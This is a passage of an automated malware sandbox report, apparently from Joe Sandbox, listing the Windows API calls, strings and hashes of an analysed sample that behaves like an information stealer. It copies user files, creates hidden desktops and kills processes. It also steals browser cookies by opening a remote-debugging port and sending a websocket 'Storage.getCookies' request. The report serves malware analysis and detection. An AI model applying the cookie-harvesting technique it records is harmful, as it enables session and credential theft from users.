                                  • wsprintfA.USER32 ref: 003FCBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FCC13
                                  • lstrcat.KERNEL32(?,?), ref: 003FCC5F
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FCC71
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FCC8B
                                  • wsprintfA.USER32 ref: 003FCCB0
                                  • PathMatchSpecA.SHLWAPI(?,011A88F8), ref: 003FCCE2
                                  • CoInitialize.OLE32(00000000), ref: 003FCCEE
                                    • Part of subcall function 003FCAE0: CoCreateInstance.COMBASE(0040B110,00000000,00000001,0040B100,?), ref: 003FCB06
                                    • Part of subcall function 003FCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003FCB46
                                    • Part of subcall function 003FCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003FCBC9
                                  • CoUninitialize.COMBASE ref: 003FCD09
                                  • lstrcat.KERNEL32(?,?), ref: 003FCD2E
                                  • lstrlen.KERNEL32(?), ref: 003FCD3B
                                  • StrCmpCA.SHLWAPI(?,0040CFEC), ref: 003FCD55
                                  • wsprintfA.USER32 ref: 003FCD7D
                                  • wsprintfA.USER32 ref: 003FCD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 003FCDB0
                                  • wsprintfA.USER32 ref: 003FCDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003FCDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003FCE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 003FCE28
                                  • CloseHandle.KERNEL32(00000000), ref: 003FCE33
                                  • CloseHandle.KERNEL32(00000000), ref: 003FCE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003FCE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FCE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 003FCF8D
                                  • FindClose.KERNEL32(?), ref: 003FCF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: 890654437ceb184e8730fadedac1e977f973a4248a4b9aad56e8d7241f9a5e0d
                                  • Instruction ID: ac8ba38689f0ae351070620904f8bfe5282f2529378f63cfa2f3dace5f0a9795
                                  • Opcode Fuzzy Hash: 890654437ceb184e8730fadedac1e977f973a4248a4b9aad56e8d7241f9a5e0d
                                  • Instruction Fuzzy Hash: 05C1717191021C9FCB21DF64DD85EEE777ABF88300F149599F609A7290DE34AA85CB60
                                  APIs
                                  • memset.MSVCRT ref: 003E9790
                                  • lstrcat.KERNEL32(?,?), ref: 003E97A0
                                  • lstrcat.KERNEL32(?,?), ref: 003E97B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003E97C3
                                  • memset.MSVCRT ref: 003E97D7
                                    • Part of subcall function 00403E70: lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00403EA5
                                    • Part of subcall function 00403E70: lstrcpy.KERNEL32(00000000,011B0000), ref: 00403ECF
                                    • Part of subcall function 00403E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,003E134E,?,0000001A), ref: 00403ED9
                                  • wsprintfA.USER32 ref: 003E9806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 003E9827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 003E9844
                                    • Part of subcall function 004046A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004046B9
                                    • Part of subcall function 004046A0: Process32First.KERNEL32(00000000,00000128), ref: 004046C9
                                    • Part of subcall function 004046A0: Process32Next.KERNEL32(00000000,00000128), ref: 004046DB
                                    • Part of subcall function 004046A0: StrCmpCA.SHLWAPI(?,?), ref: 004046ED
                                    • Part of subcall function 004046A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404702
                                    • Part of subcall function 004046A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00404711
                                    • Part of subcall function 004046A0: CloseHandle.KERNEL32(00000000), ref: 00404718
                                    • Part of subcall function 004046A0: Process32Next.KERNEL32(00000000,00000128), ref: 00404726
                                    • Part of subcall function 004046A0: CloseHandle.KERNEL32(00000000), ref: 00404731
                                  • memset.MSVCRT ref: 003E9862
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E9878
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E9889
                                  • lstrcat.KERNEL32(00000000,00414B60), ref: 003E989B
                                  • memset.MSVCRT ref: 003E98AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003E98D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E9903
                                  • StrStrA.SHLWAPI(00000000,011B06A0), ref: 003E9919
                                  • lstrcpyn.KERNEL32(006193D0,00000000,00000000), ref: 003E9938
                                  • lstrlen.KERNEL32(?), ref: 003E994B
                                  • wsprintfA.USER32 ref: 003E995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003E9971
                                  • memset.MSVCRT ref: 003E9986
                                  • Sleep.KERNEL32(00001388), ref: 003E99E7
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E92E1
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E92FA
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E9399
                                    • Part of subcall function 003E92B0: strlen.MSVCRT ref: 003E93E6
                                    • Part of subcall function 00404740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00404759
                                    • Part of subcall function 00404740: Process32First.KERNEL32(00000000,00000128), ref: 00404769
                                    • Part of subcall function 00404740: Process32Next.KERNEL32(00000000,00000128), ref: 0040477B
                                    • Part of subcall function 00404740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040479C
                                    • Part of subcall function 00404740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004047AB
                                    • Part of subcall function 00404740: CloseHandle.KERNEL32(00000000), ref: 004047B2
                                    • Part of subcall function 00404740: Process32Next.KERNEL32(00000000,00000128), ref: 004047C0
                                    • Part of subcall function 00404740: CloseHandle.KERNEL32(00000000), ref: 004047CB
                                  • CloseDesktop.USER32(?), ref: 003E9A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 2040986984-1862457068
                                  • Opcode ID: ca0e7f49e39a88f0c306a05d5838f15beb95fa1fdc00e2828b679eecd18ed105
                                  • Instruction ID: 2ed5ae051d25c8d34b384b3f4ca4cd34d29ca347cb3b93ee8aa2cc1fa685cd78
                                  • Opcode Fuzzy Hash: ca0e7f49e39a88f0c306a05d5838f15beb95fa1fdc00e2828b679eecd18ed105
                                  • Instruction Fuzzy Hash: 62918771900218AFDB11DF74DC45FDE77B9AF48700F148169F609AB191DF74AA44CBA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F12BF
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F12E7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F133A
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003F135C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003F1376
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F13E2
                                  • lstrlen.KERNEL32(00411794), ref: 003F13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F140A
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003F1416
                                  • lstrlen.KERNEL32(?), ref: 003F1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 003F1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F147A
                                  • StrCmpCA.SHLWAPI(?,011AECF0), ref: 003F14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F1535
                                  • StrCmpCA.SHLWAPI(?,011AF418), ref: 003F1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F15E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003F17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003F181C
                                  • FindClose.KERNEL32(00000000), ref: 003F182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: a2a88016feab553d5364461eb8ecb4ae9b20c4127fd7f912afe94e4599945b65
                                  • Instruction ID: 84b5876d08755ec32e3977e8ed78d554088e7b5daed5a4d5932eebf0b26033d3
                                  • Opcode Fuzzy Hash: a2a88016feab553d5364461eb8ecb4ae9b20c4127fd7f912afe94e4599945b65
                                  • Instruction Fuzzy Hash: A9C1C031A1021ADBCB22EF75EC89AEF77B9AF44300F055129F94A97291DF34DD458BA0
                                  APIs
                                  • wsprintfA.USER32 ref: 003FE22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FE243
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FE263
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FE27D
                                  • wsprintfA.USER32 ref: 003FE2A2
                                  • StrCmpCA.SHLWAPI(?,0040CFEC), ref: 003FE2B4
                                  • wsprintfA.USER32 ref: 003FE2D1
                                    • Part of subcall function 003FEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003FEE12
                                  • wsprintfA.USER32 ref: 003FE2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 003FE304
                                  • lstrcat.KERNEL32(?,011B0B20), ref: 003FE335
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FE347
                                  • lstrcat.KERNEL32(?,?), ref: 003FE358
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FE36A
                                  • lstrcat.KERNEL32(?,?), ref: 003FE37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003FE394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE422
                                  • DeleteFileA.KERNEL32(?), ref: 003FE45C
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003FE49B
                                  • FindClose.KERNEL32(00000000), ref: 003FE4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 1eee47d24de33ae85dba91cbf990abdcf68a61bc2508b5c6efb3b9bc54b988ab
                                  • Instruction ID: a3ad70ed2bc22e673fd0003fe1a1004dff6d53ccb6df3fbb6a2ed1ab2fe82b94
                                  • Opcode Fuzzy Hash: 1eee47d24de33ae85dba91cbf990abdcf68a61bc2508b5c6efb3b9bc54b988ab
                                  • Instruction Fuzzy Hash: A481737290021CAFCB21EF65DC49AEF7779BF44300F0489A9B61A97191DF74AA45CFA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E16E2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E176C
                                  • lstrcat.KERNEL32(00000000), ref: 003E1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E17A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E18FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: d78b4905922dc167132e7fac8316f4bd0cb4f4d32be2c8964ab23672ee9de69d
                                  • Instruction ID: f1e576b1b8a2e4698b05276b05cc7be191090da6038958a3d999a5c76daa7fe8
                                  • Opcode Fuzzy Hash: d78b4905922dc167132e7fac8316f4bd0cb4f4d32be2c8964ab23672ee9de69d
                                  • Instruction Fuzzy Hash: 7A81A8319101AADBCB23EF66D885AAF77B9AF04700F055325F805AB2D2CB709D51CBA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003FDD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003FDD4C
                                  • wsprintfA.USER32 ref: 003FDD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FDD79
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FDD9C
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FDDB6
                                  • wsprintfA.USER32 ref: 003FDDD4
                                  • DeleteFileA.KERNEL32(?), ref: 003FDE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 003FDDED
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                    • Part of subcall function 003FD980: memset.MSVCRT ref: 003FD9A1
                                    • Part of subcall function 003FD980: memset.MSVCRT ref: 003FD9B3
                                    • Part of subcall function 003FD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FD9DB
                                    • Part of subcall function 003FD980: lstrcpy.KERNEL32(00000000,?), ref: 003FDA0E
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,00000000), ref: 003FDA1C
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,011B04A8), ref: 003FDA36
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,?), ref: 003FDA4A
                                    • Part of subcall function 003FD980: lstrcat.KERNEL32(?,011AED80), ref: 003FDA5E
                                    • Part of subcall function 003FD980: lstrcpy.KERNEL32(00000000,?), ref: 003FDA8E
                                    • Part of subcall function 003FD980: GetFileAttributesA.KERNEL32(00000000), ref: 003FDA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003FDE2E
                                  • FindClose.KERNEL32(00000000), ref: 003FDE3D
                                  • lstrcat.KERNEL32(?,011B0B20), ref: 003FDE66
                                  • lstrcat.KERNEL32(?,011AF318), ref: 003FDE7A
                                  • lstrlen.KERNEL32(?), ref: 003FDE84
                                  • lstrlen.KERNEL32(?), ref: 003FDE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FDED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: 1bcdef78057c27ff86ce858d6607395852b730c6d7932539514635f308cc1295
                                  • Instruction ID: c3cb69f53a22dbee6ea4244b54bdf3ed2eb8b9e71cd283216d976a8a1dfef72d
                                  • Opcode Fuzzy Hash: 1bcdef78057c27ff86ce858d6607395852b730c6d7932539514635f308cc1295
                                  • Instruction Fuzzy Hash: 0C616372910218AFCB11EF74DC89AEE77BABF48301F0485A9B60597291DF34AA55CB50
                                  APIs
                                  • wsprintfA.USER32 ref: 003FD54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 003FD564
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003FD584
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003FD59E
                                  • lstrcat.KERNEL32(?,011B0B20), ref: 003FD5E3
                                  • lstrcat.KERNEL32(?,011B0BC0), ref: 003FD5F7
                                  • lstrcat.KERNEL32(?,?), ref: 003FD60B
                                  • lstrcat.KERNEL32(?,?), ref: 003FD61C
                                  • lstrcat.KERNEL32(?,00411794), ref: 003FD62E
                                  • lstrcat.KERNEL32(?,?), ref: 003FD642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FD682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FD6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003FD737
                                  • FindClose.KERNEL32(00000000), ref: 003FD746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: 6f6f1f671ae68a94766fbf20c61c91a7333f3ca4976d8e003c3b4b574d583424
                                  • Instruction ID: 185fb504a035cf1c5138c505a71d0e9159dbaceb06941a6b0566f9d3cf739372
                                  • Opcode Fuzzy Hash: 6f6f1f671ae68a94766fbf20c61c91a7333f3ca4976d8e003c3b4b574d583424
                                  • Instruction Fuzzy Hash: 0C6183719102199FCB21EF74DC88AEE77B9EF48301F0485A9E649D7291DB34AA54CFA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: b095056307cf7a035f1c587558d668d9ca07c08afe539e1b97bf930a69a579b3
                                  • Instruction ID: 935eca1e717faaa75f68978d1793f3a34eefa41e086fdca648adedb688856b61
                                  • Opcode Fuzzy Hash: b095056307cf7a035f1c587558d668d9ca07c08afe539e1b97bf930a69a579b3
                                  • Instruction Fuzzy Hash: 47A25971D012699FDB20DBA8C9807DEBBB6EF89300F1485BAD508B7281DB745E85CF94
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F2402
                                  • lstrlen.KERNEL32(\*.*), ref: 003F240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003F2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: a323666cc5e92f8bf27de0a213263ea7b36fa68c638f03e36832580727f96140
                                  • Instruction ID: aefc93e312c8e172bf4a5565634452268e5a20296f19ac8d760bbeece88fb6cc
                                  • Opcode Fuzzy Hash: a323666cc5e92f8bf27de0a213263ea7b36fa68c638f03e36832580727f96140
                                  • Instruction Fuzzy Hash: 5A417331511269DBCB33EF26DC85BAF73A9AF14310F055235B9499B292CFB09D518B90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004046B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 004046C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 004046DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 004046ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00404702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00404711
                                  • CloseHandle.KERNEL32(00000000), ref: 00404718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00404726
                                  • CloseHandle.KERNEL32(00000000), ref: 00404731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 1f786905398b1a3126b2b0501058f4bff81ab66334525455657ecf574811fbed
                                  • Instruction ID: 554051e1088d0bfcd6e1e2d8abb223838bd3e88b852ebf3ad8b604d701d5f67c
                                  • Opcode Fuzzy Hash: 1f786905398b1a3126b2b0501058f4bff81ab66334525455657ecf574811fbed
                                  • Instruction Fuzzy Hash: 4001C4715011146FE7205B60DC8CFFB377DEB89B42F0840AAFA05E2180EF789A418B75
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00404628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00404638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0040464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00404660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00404672
                                  • CloseHandle.KERNEL32(00000000), ref: 0040467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: 59c90945ce732de9c7dc40a40a20a3704bf9dcdb8f8451fb292aa9970096ad5e
                                  • Instruction ID: 0cd5f08c27e7e7d9f8fe33096373189fbba4e2c63058de6974d410d8f511383a
                                  • Opcode Fuzzy Hash: 59c90945ce732de9c7dc40a40a20a3704bf9dcdb8f8451fb292aa9970096ad5e
                                  • Instruction Fuzzy Hash: 360184715011149FD7209B609C48FEB77ADEB4D351F0441DBE908D1180EF788A948AE5
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F4B7F
                                  • lstrlen.KERNEL32(00414CA8), ref: 003F4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BA7
                                  • lstrcat.KERNEL32(00000000,00414CA8), ref: 003F4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F4BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: 2d2de4fe67c4fa7b4a70671f2853a1e7591cc8664c554f77501159fb3442e7fb
                                  • Instruction ID: 7574940f24dbd8d0e9e733cc6e1065eb55a1f711a69440a5925dcf054d17fcb6
                                  • Opcode Fuzzy Hash: 2d2de4fe67c4fa7b4a70671f2853a1e7591cc8664c554f77501159fb3442e7fb
                                  • Instruction Fuzzy Hash: FB31603252116A9BC723EF25EC85EAF77B9AF40710F055235F9459B292DF70EC118BA0
                                  APIs
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00402D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00402DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00402DBA
